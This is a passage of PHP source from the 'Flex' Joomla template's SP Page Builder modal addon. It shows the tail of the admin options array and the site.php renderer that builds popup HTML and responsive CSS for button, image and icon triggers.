						''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DEFAULT'),
						'lg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_LARGE'),
						'xlg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_XLARGE'),
						'sm'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_SMALL'),
						'xs'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_EXTRA_SAMLL'),
					),
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),

				'button_shape'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_DESC'),
					'values'=>array(
						'rounded'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUNDED'),
						'square'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_SQUARE'),
						'round'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUND'),
					),
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),

				'button_block'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK_DESC'),
					'values'=>array(
						''=>JText::_('JNO'),
						'sppb-btn-block'=>JText::_('JYES'),
					),
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),
				
				'button_peicon'=>array( // Pixeden Icons
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_PIXEDEN_ICON'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_PIXEDEN_ICON_DESC'),
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
					'values'=> $peicon_list
				),

				'button_icon'=>array(
					'type'=>'icon',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_DESC'),
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),

				'button_icon_position'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_POSITION'),
					'values'=>array(
						'left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),

				// Image
				'selector_image'=>array(
					'type'=>'media',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_SELECT_DESC'),
					'depends'=>array('modal_selector'=>'image'),
					'std'=> array(
						'src' => '',
					)
				),
				
				// Icon
				'show_ripple_effect'=>array(
					'type'=>'checkbox',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_RIPPLE_EFFECT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_RIPPLE_EFFECT_DESC'),
					'std'=> 0,
					'depends'=>array('modal_selector'=>'icon')
				),
				
				// Pixeden Icons
				'peicon_name'=>array( // Pixeden Icons
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIXEDEN_ICON'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIXEDEN_ICON_DESC'),
					'depends'=>array('modal_selector'=>'icon'),
					'values'=> $peicon_list
				),

				'selector_icon_name'=>array(
					'type'=>'icon',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_DESC'),
					'std'=> '',
					'depends'=>array('modal_selector'=>'icon')
				),

				'selector_icon_size'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_SIZE_DESC'),
					'std'=>array('md'=>36),
					'max'=>400,
					'responsive'=>true,
					'depends'=>array('modal_selector'=>'icon')
				),

				'selector_icon_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_COLOR_DESC'),
					'depends'=>array('modal_selector'=>'icon')
				),

				'selector_icon_background'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BG_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BG_COLOR_DESC'),
					'depends'=>array('modal_selector'=>'icon')
				),

				'selector_icon_border_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BORDER_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BORDER_COLOR_DESC'),
					'depends'=>array('modal_selector'=>'icon')
				),

				'selector_icon_border_width'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BORDER_WIDTH_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BORDER_WIDTH_SIZE_DESC'),
					'placeholder'=>'3',
					'max'=>400,
					'responsive'=>true,
					'depends'=>array('modal_selector'=>'icon')
				),

				'selector_icon_border_radius'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BORDER_RADIUS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BORDER_RADIUS_DESC'),
					'placeholder'=>'5',
					'max'=>400,
					'responsive'=>true,
					'depends'=>array('modal_selector'=>'icon')
				),

				'selector_icon_padding'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_PADDING'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_PADDING_DESC'),
					'placeholder'=>'20',
					'max'=>400,
					'responsive'=>true,
					'depends'=>array('modal_selector'=>'icon')
				),

				'selector_text'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_TEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_TEXT_DESC'),
					'std'=>'',
					'depends'=>array(array('modal_selector', '!=' , 'button')),
					'placeholder'=>'Click to view detail'
				),

				'selector_text_size'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_TEXT_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_TEXT_SIZE_DESC'),
					'placeholder'=>36,
					'max'=>300,
					'depends'=>array(array('modal_selector', '!=' , 'button')),
					'responsive'=>true,
				),

				'selector_text_weight'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_TEXT_WEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_TEXT_WEIGHT_DESC'),
					'placeholder'=>700,
					'std'=>'',
					'depends'=>array(array('modal_selector', '!=' , 'button')),
				),

				'selector_text_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_TEXT_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_TEXT_COLOR_DESC'),
					'std'=>'',
					'depends'=>array(array('modal_selector', '!=' , 'button')),
				),

				'selector_text_margin'=>array(
					'type'=>'margin',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_TEXT_MARGIN'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_TEXT_MARGIN_DESC'),
					'placeholder'=>10,
					'depends'=>array(array('modal_selector', '!=' , 'button')),
				),

				//Admin Only
				'separator'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_MODAL_CONTENT'),
				),

				'modal_content_type'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_CONTENT_TYPE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_CONTENT_TYPE_DESC'),
					'values'=>array(
						'text'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_CONTENT_TYPE_TEXT'),
						'image'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE'),
						'video'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_CONTENT_TYPE_VIDEO'),
					),
					'std'=>'text',
				),

				'modal_content_text'=>array(
					'type'=>'editor',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_TEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_TEXT_DESC'),
					'std'=>'Kevin chicken fatback sirloin ball tip, flank meatloaf t-bone. Meatloaf shankle swine pancetta biltong capicola ham hock meatball. Shoulder bacon andouille ground round pancetta pastrami. Sirloin beef ribs tenderloin rump corned beef filet mignon capicola kielbasa drumstick chuck turducken beef t-bone ribeye. Pork loin ground round t-bone chuck beef ribs swine pastrami cow. Venison tenderloin drumstick, filet mignon salami jowl sausage shank hamburger meatball ribeye kevin tri-tip. Swine kielbasa tenderloin fatback pork shankle andouille, flank frankfurter jerky chicken tri-tip jowl leberkas.&lt;br&gt;&lt;br&gt;Pancetta chicken pork belly beef cow kielbasa fatback sirloin biltong andouille bacon. Sirloin beef tenderloin porchetta, jerky tri-tip andouille sausage landjaeger shank bresaola short ribs tongue meatloaf fatback. Kielbasa pancetta shoulder tri-tip pastrami filet mignon ham corned beef prosciutto doner beef ribs. Doner sausage ham hock, shoulder sirloin pancetta boudin filet mignon chuck. Meatball ham hock beef, filet mignon tri-tip andouille venison ground round chuck turducken drumstick.',
					'depends'=>array('modal_content_type'=>'text')
				),

				'modal_content_image'=>array(
					'type'=>'media',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_IMAGE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_IMAGE_DESC'),
					'depends'=>array('modal_content_type'=>'image'),
					'std'=> array(
						'src' => '',
					)
				),

				'modal_content_video_url'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_VIDEO'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_VIDEO_DESC'),
					'depends'=>array('modal_content_type'=>'video')
				),

				'modal_popup_width'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_POPUP_WIDTH'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_POPUP_WIDTH_DESC'),
					'std'=>'760',
					'depends'=>array(
						array('modal_content_type', '!=', 'video')
					),
				),

				'modal_popup_height'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_POPUP_HEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_POPUP_HEIGHT_DESC'),
					'std'=>'440',
					'depends'=>array(
						array('modal_content_type', '!=', 'video')
					),
				),

				'alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ALIGNMENT_DESC'),
					'values'=>array(
						'sppb-text-left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'sppb-text-center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'sppb-text-right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std'=>'sppb-text-left',
				),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),

			),
		),
	)
);
PK!�@�v�v�(flex/sppagebuilder/addons/modal/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('Restricted access');

class SppagebuilderAddonModal extends SppagebuilderAddons{

	public function render() {
		
		// Include template's params
		$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
		$has_lazyload = $tpl_params->get('lazyload', 1);

		$settings = $this->addon->settings;
		$class = (isset($settings->class) && $settings->class) ? $settings->class : '';
        
		//Options
		$modal_selector = (isset($settings->modal_selector) && $settings->modal_selector) ? $settings->modal_selector : '';
		$button_text = (isset($settings->button_text) && $settings->button_text) ? $settings->button_text : '';
		$button_class = (isset($settings->button_type) && $settings->button_type) ? ' sppb-btn-' . $settings->button_type : ' sppb-btn-default';
		$button_class .= (isset($settings->button_size) && $settings->button_size) ? ' sppb-btn-' . $settings->button_size : '';
		$button_class .= (isset($settings->button_shape) && $settings->button_shape) ? ' sppb-btn-' . $settings->button_shape: ' sppb-btn-rounded';
		$button_class .= (isset($settings->button_appearance) && $settings->button_appearance) ? ' sppb-btn-' . $settings->button_appearance : '';
		$button_class .= (isset($settings->button_block) && $settings->button_block) ? ' ' . $settings->button_block : '';
		
		//Pixeden Icons
		$button_peicon = (isset($settings->button_peicon) && $settings->button_peicon) ? $settings->button_peicon : '';
		$button_icon = (isset($settings->button_icon) && $settings->button_icon) ? $settings->button_icon : '';
		$button_icon_position = (isset($settings->button_icon_position) && $settings->button_icon_position) ? $settings->button_icon_position: 'left';

		if($button_icon_position == 'left') {
			if ($button_peicon != '') {
				$button_text = ($button_peicon) ? '<i class="pe ' . $button_peicon . '"></i> ' . $button_text : $button_text;
			}else{
				$button_text = ($button_icon) ? '<i class="fa ' . $button_icon . '"></i> ' . $button_text : $button_text;
			}
		} else {
			if ($button_peicon != '') {
				$button_text = ($button_peicon) ? $button_text . ' <i style="margin-left:7px;margin-right:-1px;" class="pe ' . $button_peicon . '"></i>' : $button_text;
			}else{
				$button_text = ($button_icon) ? $button_text . ' <i style="margin-left:5px;margin-right:-1px;" class="fa ' . $button_icon . '"></i>' : $button_text;
			}
		}

		$selector_image = (isset($settings->selector_image) && $settings->selector_image) ? $settings->selector_image : '';
		$selector_image_src = isset($selector_image->src) ? $selector_image->src : $selector_image;
		$selector_image_width = (isset($selector_image->width) && $selector_image->width) ? $selector_image->width : '';
		$selector_image_height = (isset($selector_image->height) && $selector_image->height) ? $selector_image->height : '';

		//Pixeden Icon
		$peicon_name = (isset($settings->peicon_name) && $settings->peicon_name) ? $settings->peicon_name : '';
		$selector_icon_name = (isset($settings->selector_icon_name) && $settings->selector_icon_name) ? $settings->selector_icon_name : '';
		$alignment = (isset($settings->alignment) && $settings->alignment) ? $settings->alignment : '';
		$modal_unique_id = 'sppb-modal-' . $this->addon->id;
		$modal_content_type = (isset($settings->modal_content_type) && $settings->modal_content_type) ? $settings->modal_content_type : 'text';
		$modal_content_text = (isset($settings->modal_content_text) && $settings->modal_content_text) ? $settings->modal_content_text : '';
		$modal_content_image = (isset($settings->modal_content_image) && $settings->modal_content_image) ? $settings->modal_content_image : '';
		$modal_content_image_src = isset($modal_content_image->src) ? $modal_content_image->src : $modal_content_image;
		$modal_content_video_url = (isset($settings->modal_content_video_url) && $settings->modal_content_video_url) ? $settings->modal_content_video_url : '';
		$selector_text = (isset($settings->selector_text) && $settings->selector_text) ? $settings->selector_text : '';
		$show_ripple_effect = (isset($settings->show_ripple_effect) && $settings->show_ripple_effect) ? $settings->show_ripple_effect : '';

		if ( $modal_content_type == 'text' ) {
			$mfg_type = 'inline';
		} else if ( $modal_content_type == 'video' ) {
			$mfg_type = 'iframe';
		} else if ( $modal_content_type == 'image' ) {
			$mfg_type = 'image';
		}

		$output = '';

		if($modal_content_type == 'text') {
			$url = '#' . $modal_unique_id;
			$output .= '<div id="' . $modal_unique_id . '" class="mfp-hide white-popup-block modal-text">';
				$output .= '<div class="modal-inner-block">';
					$output .= $modal_content_text;
				$output .= '</div>';
			$output .= '</div>';
			$attribs = 'data-popup_type="inline" data-mainclass="mfp-no-margins mfp-with-zoom"';
		} else if( $modal_content_type == 'video') {
			$url = $modal_content_video_url;
			$attribs = 'data-popup_type="iframe" data-mainclass="mfp-no-margins mfp-with-zoom"';
		} else {
			$url_part_of_content = explode('/', $modal_content_image_src);
			$alt_for_content = end($url_part_of_content);
			$url = '#' . $modal_unique_id;
			$output .= '<div id="' . $modal_unique_id . '" class="mfp-hide popup-image-block">';
				$output .= '<div class="modal-inner-block">';
				// Image
				if(strpos($modal_content_image, 'http://') !== false || strpos($modal_content_image, 'https://') !== false){
					/* Lazyload for images with absolute URL */
					if($has_lazyload) {
						$output .= '<img class="lazyload mfp-img" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="'. $modal_content_image .'" alt="'. $alt_for_content .'">';
					} else {
						$output .= '<img class="mfp-img" src="'.$modal_content_image.'" alt="'. $alt_for_content .'">';	
					}
				} else {
					/* Lazyload for images for relative URL (local image) */
					if($has_lazyload) {
						$output .= '<img class="lazyload mfp-img" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="'. JUri::root() . $modal_content_image .'" alt="'. $alt_for_content .'">';
					} else {
						$output .= '<img class="mfp-img" src="'.$modal_content_image.'" alt="'. $alt_for_content .'">';
					}
				}
				
				//$output .= '<img class="mfp-img" src="'.$modal_content_image_src.'" alt="'. $alt_for_content .'">';
				
				$output .= '</div>';
			$output .= '</div>';
			$attribs = 'data-popup_type="inline" data-mainclass="mfp-no-margins mfp-with-zoom"';
		}

		$output .= '<div class="' . $class . ' ' . $alignment . '">';

		if($modal_selector=='image') {
			if ($selector_image_src) {
				//Lazyload image
				$placeholder = $selector_image_src == '' ? false : $this->get_image_placeholder($selector_image_src);

				$url_part_of_button = explode('/', $selector_image_src);
				if($selector_text) {
					$alt_for_button = $selector_text;
				} else {
					$alt_for_button = end($url_part_of_button);
				}
				$image_link = '';
				if(strpos($selector_image_src, "http://") !== false || strpos($selector_image_src, "https://") !== false){
					$image_link = $selector_image_src;
				} else {
					$image_link = JURI::base() . $selector_image_src;
				}
				$output .= '<a class="sppb-modal-selector sppb-magnific-popup" '. $attribs .' href="'. $url . '" id="'. $modal_unique_id .'-selector"><img '.($placeholder ? 'class="sppb-element-lazy"' : '').' src="' . ($placeholder ? $placeholder : $image_link) . '" alt="'. $alt_for_button .'" '.($placeholder ? 'data-large="'.$image_link.'"' : '').' '.($selector_image_width ? 'width="'.$selector_image_width.'"' : '').' '.($selector_image_height ? 'height="'.$selector_image_height.'"' : '').' loading="lazy">';
					$output  .= ($selector_text) ? '<span class="text">' . $selector_text . '</span>' : '';
				$output  .= '</a>';
			}
		} else if ($modal_selector=='icon') {
			if($selector_icon_name || $peicon_name) {
				$select_icon = explode(' ', $selector_icon_name);
				if (count($select_icon) === 1) {
					$selector_icon_name = 'fa ' . $selector_icon_name;
				}
				$output  .= '<a class="sppb-modal-selector sppb-magnific-popup" href="'. $url . '" '. $attribs .' id="'. $modal_unique_id .'-selector">';
				$output  .= '<span class="sppb-modal-icon-wrap">';
				
				if ($peicon_name != '') {
					$output .= '<i class="pe ' . $peicon_name . '" aria-hidden="true"></i>';
				}else{
					$output .= '<i class="' . $selector_icon_name . '" aria-hidden="true"></i>';
				}
				
				//$output  .= '<i class="' . $selector_icon_name . '" aria-hidden="true"></i>';
				
				if($show_ripple_effect) {
					$output  .= '<span class="sppb-ripple-effect"></span>';
				}
				$output  .= '</span>';
				$output  .= ($selector_text) ? '<span class="text">' . $selector_text . '</span>' : '';
				$output  .= '</a>';
			}
		} else {
			$output .= '<a class="sppb-btn ' . $button_class . ' sppb-magnific-popup sppb-modal-selector" '. $attribs .' href="'. $url . '" id="'. $modal_unique_id .'-selector">'. $button_text .'</a>';
		}

		$output .= '</div>';

		return $output;
	}

	public function scripts() {
		return array(JURI::base(true) . '/components/com_sppagebuilder/assets/js/jquery.magnific-popup.min.js');
	}

	public function stylesheets() {
		return array(JURI::base(true) . '/components/com_sppagebuilder/assets/css/magnific-popup.css');
	}

	public function css() {
		$addon_id = '#sppb-addon-' . $this->addon->id;

		$modal_content_type = (isset($this->addon->settings->modal_content_type) && $this->addon->settings->modal_content_type) ? $this->addon->settings->modal_content_type : 'text';

		$modal_size  = (isset($this->addon->settings->modal_popup_width) && $this->addon->settings->modal_popup_width) ? 'max-width: ' .$this->addon->settings->modal_popup_width . 'px;' : '';
		$modal_size .= (isset($this->addon->settings->modal_popup_height) && $this->addon->settings->modal_popup_height) ? ' height: ' . $this->addon->settings->modal_popup_height . 'px;' : '';

		$selector_style	= '';
		$selector_style_sm	= '';
		$selector_style_xs	= '';

		$modal_selector = (isset($this->addon->settings->modal_selector) && $this->addon->settings->modal_selector) ? $this->addon->settings->modal_selector : '';
		//Pixeden Icon
		$peicon_name = (isset($this->addon->settings->peicon_name) && $this->addon->settings->peicon_name) ? $this->addon->settings->peicon_name : '';
		//Fontawesome Icon
		$selector_icon_name = (isset($this->addon->settings->selector_icon_name) && $this->addon->settings->selector_icon_name) ? $this->addon->settings->selector_icon_name : '';
		$selector_image = (isset($this->addon->settings->selector_image) && $this->addon->settings->selector_image) ? $this->addon->settings->selector_image : '';
		$selector_style	.= (isset($this->addon->settings->selector_margin_top) && $this->addon->settings->selector_margin_top) ? 'margin-top:' . (int) $this->addon->settings->selector_margin_top .'px;' : '';
		$selector_style	.= (isset($this->addon->settings->selector_margin_bottom) && $this->addon->settings->selector_margin_bottom) ? 'margin-bottom:' . (int) $this->addon->settings->selector_margin_bottom .'px;' : '';

		$css = '';

		if( $modal_selector == 'icon' || $modal_selector == 'image' ) {
			if($selector_icon_name || $peicon_name || $selector_image) {
				$selector_text_style	= (isset($this->addon->settings->selector_text_size) && $this->addon->settings->selector_text_size) ? 'font-size:' . $this->addon->settings->selector_text_size .'px;' : '';
				$selector_text_style	.= (isset($this->addon->settings->selector_text_weight) && $this->addon->settings->selector_text_weight) ? 'font-weight:' . $this->addon->settings->selector_text_weight .';' : '';
				$selector_text_style	.= (isset($this->addon->settings->selector_text_margin) && $this->addon->settings->selector_text_margin) ? 'margin:' . $this->addon->settings->selector_text_margin .';' : '';
				$selector_text_style	.= (isset($this->addon->settings->selector_text_color) && $this->addon->settings->selector_text_color) ? 'color:' . $this->addon->settings->selector_text_color .';' : '';

				if($selector_text_style) {
					$css .= $addon_id . ' .sppb-modal-selector span.text {';
					$css .= $selector_text_style;
					$css .= '}';
				}
			}
		}

		if($modal_selector == 'icon') {
			if($selector_icon_name || $peicon_name) {
				$selector_style	.= 'display:inline-block;line-height:1;';

				$selector_style	.= (isset($this->addon->settings->selector_icon_padding) && $this->addon->settings->selector_icon_padding) ? 'padding:' . (int) $this->addon->settings->selector_icon_padding .'px;' : '';
				$selector_style_sm	.= (isset($this->addon->settings->selector_icon_padding_sm) && $this->addon->settings->selector_icon_padding_sm) ? 'padding:' . (int) $this->addon->settings->selector_icon_padding_sm .'px;' : '';
				$selector_style_xs	.= (isset($this->addon->settings->selector_icon_padding_xs) && $this->addon->settings->selector_icon_padding_xs) ? 'padding:' . (int) $this->addon->settings->selector_icon_padding_xs .'px;' : '';

				$selector_style	.= (isset($this->addon->settings->selector_icon_color) && $this->addon->settings->selector_icon_color) ? 'color:' . $this->addon->settings->selector_icon_color .';' : '';
				$selector_style	.= (isset($this->addon->settings->selector_icon_background) && $this->addon->settings->selector_icon_background) ? 'background-color:' . $this->addon->settings->selector_icon_background .';' : '';
				$selector_style	.= (isset($this->addon->settings->selector_icon_border_color) && $this->addon->settings->selector_icon_border_color) ? 'border-style:solid;border-color:' . $this->addon->settings->selector_icon_border_color .';' : '';

				$selector_style	.= (isset($this->addon->settings->selector_icon_border_width) && $this->addon->settings->selector_icon_border_width) ? 'border-width:' . (int) $this->addon->settings->selector_icon_border_width .'px;' : '';
				$selector_style_sm	.= (isset($this->addon->settings->selector_icon_border_width_sm) && $this->addon->settings->selector_icon_border_width_sm) ? 'border-width:' . (int) $this->addon->settings->selector_icon_border_width_sm .'px;' : '';
				$selector_style_xs	.= (isset($this->addon->settings->selector_icon_border_width_xs) && $this->addon->settings->selector_icon_border_width_xs) ? 'border-width:' . (int) $this->addon->settings->selector_icon_border_width_xs .'px;' : '';

				$selector_style	.= (isset($this->addon->settings->selector_icon_border_radius) && $this->addon->settings->selector_icon_border_radius) ? 'border-radius:' . (int) $this->addon->settings->selector_icon_border_radius .'px;' : '';
				$selector_style_sm	.= (isset($this->addon->settings->selector_icon_border_radius_sm) && $this->addon->settings->selector_icon_border_radius_sm) ? 'border-radius:' . (int) $this->addon->settings->selector_icon_border_radius_sm .'px;' : '';
				$selector_style_xs	.= (isset($this->addon->settings->selector_icon_border_radius_xs) && $this->addon->settings->selector_icon_border_radius_xs) ? 'border-radius:' . (int) $this->addon->settings->selector_icon_border_radius_xs .'px;' : '';

				$selector_icon_style_sm = '';
				$selector_icon_style_xs = '';
				$selector_icon_style = (isset($this->addon->settings->selector_icon_size) && $this->addon->settings->selector_icon_size) ? 'font-size:' . (int) $this->addon->settings->selector_icon_size . 'px;width:' . (int) $this->addon->settings->selector_icon_size . 'px;height:' . (int) $this->addon->settings->selector_icon_size . 'px;line-height:' . (int) $this->addon->settings->selector_icon_size . 'px;' : '';
				$selector_icon_style_sm	= (isset($this->addon->settings->selector_icon_size_sm) && $this->addon->settings->selector_icon_size_sm) ? 'font-size:' . (int) $this->addon->settings->selector_icon_size_sm . 'px;width:' . (int) $this->addon->settings->selector_icon_size_sm . 'px;height:' . (int) $this->addon->settings->selector_icon_size_sm . 'px;line-height:' . (int) $this->addon->settings->selector_icon_size_sm . 'px;' : '';
				$selector_icon_style_xs	= (isset($this->addon->settings->selector_icon_size_xs) && $this->addon->settings->selector_icon_size_xs) ? 'font-size:' . (int) $this->addon->settings->selector_icon_size_xs . 'px;width:' . (int) $this->addon->settings->selector_icon_size_xs . 'px;height:' . (int) $this->addon->settings->selector_icon_size_xs . 'px;line-height:' . (int) $this->addon->settings->selector_icon_size_xs . 'px;' : '';

				if($selector_style) {
					$css .= $addon_id . ' .sppb-modal-selector span {';
					$css .= $selector_style;
					$css .= '}';
				}

				if($selector_style_sm) {
					$css .= '@media (min-width: 768px) and (max-width: 991px) {';
						$css .= $addon_id . ' .sppb-modal-selector span {';
							$css .= $selector_style_sm;
						$css .= '}';
					$css .= '}';
				}

				if($selector_style_xs) {
					$css .= '@media (max-width: 767px) {';
						$css .= $addon_id . ' .sppb-modal-selector span {';
							$css .= $selector_style_xs;
						$css .= '}';
					$css .= '}';
				}

				if($selector_icon_style) {
					$css .= $addon_id . ' .sppb-modal-selector span > i {';
					$css .= $selector_icon_style;
					$css .= '}';
				}

				if($selector_icon_style_sm) {
					$css .= '@media (min-width: 768px) and (max-width: 991px) {';
						$css .= $addon_id . ' .sppb-modal-selector span > i {';
							$css .= $selector_icon_style_sm;
						$css .= '}';
					$css .= '}';
				}

				if($selector_icon_style_xs) {
					$css .= '@media (max-width: 767px) {';
						$css .= $addon_id . ' .sppb-modal-selector span > i {';
							$css .= $selector_icon_style_xs;
						$css .= '}';
					$css .= '}';
				}

			}
		} else {
			if($selector_style) {
				$css .= $addon_id . ' .sppb-modal-selector {';
				$css .= $selector_style;
				$css .= '}';
			}
		}

		if( $modal_content_type != 'video' && $modal_size) {
			if ($modal_content_type == 'image') {
				$css .= '#sppb-modal-' . $this->addon->id . '.popup-image-block img{';
				$css .= $modal_size;
				$css .= '}';
			} else {
				$css .= '#sppb-modal-' . $this->addon->id . '.white-popup-block {';
				$css .= $modal_size;
				$css .= '}';
			}
		}

		// Button css
		$layout_path = JPATH_ROOT . '/components/com_sppagebuilder/layouts';
		$css_path = new JLayoutFile('addon.css.button', $layout_path);
		$css .= $css_path->render(array('addon_id' => $addon_id, 'options' => $this->addon->settings, 'id' => 'sppb-modal-' . $this->addon->id . '-selector'));

		return $css;
	}

	public static function getTemplate(){

	$output ='
	    <#
	    let modalContentType = data.modal_content_type || "text"
		let buttonIconPosition = data.button_icon_position || "left"
		let modalUniqueId = "sppb-modal-"+ data.id
		let modalUrl = "#" + modalUniqueId
		let attribs = \'data-popup_type="inline" data-mainclass="mfp-no-margins mfp-with-zoom"\'

		let buttonClass = ( data.button_type )? "sppb-btn-" + data.button_type : "sppb-btn-default"
			buttonClass += ( data.button_size )? " sppb-btn-" + data.button_size : ""
			buttonClass += ( data.button_shape )? " sppb-btn-" + data.button_shape : " sppb-btn-rounded"
			buttonClass += ( data.button_appearance )? " sppb-btn-" + data.button_appearance : ""
